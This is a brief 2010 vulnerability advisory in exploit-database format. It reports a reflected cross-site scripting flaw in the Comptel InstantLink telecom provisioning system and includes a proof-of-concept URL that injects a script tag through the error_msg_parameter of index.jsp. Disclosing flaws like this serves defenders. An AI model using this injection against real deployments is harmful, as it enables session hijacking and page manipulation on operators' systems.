--------------------------------------------------------------------
# Exploit Title: Comptel InstantLink" XSS vulnerability
# Date: 24 Feb 2010
# Author: thebluegenius
# Software Link: http://www.comptel.com/ProvisioningActivation/
# Version: All
# CVE : NA

---------------------------------------------------
"Comptel InstantLink" XSS vulnerability.
---------------------------------------------------
By       :Thebluegenius. 
Email    :rajsm@isac.org.in
Blog	 :www.thebluegenius.com.
---------------------------------------------------

Product Name: Comptel Instant Link System
Vendor      :http://www.comptel.com/ProvisioningActivation/

Description:

Comptel InstantLink automates the user provisioning and service activation processes. It covers the entire provisioning workflow - from order entry to billable service.

The product suffers from XSS vulnerability. Presently this product is deployed to over 280 Telecom customers with 800+ million subscribers across the world.

------------------
Vulnerability: XSS
------------------
you can execute XSS as given below:
http://IPaddress:port/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E

-----------------------------------------------------
Greetz Fly Out to:
1] Amforked()  : My good friend
2] Aodrulez    : for inspiring me
3] www.OrchidSeven.com
4] www.isac.org.in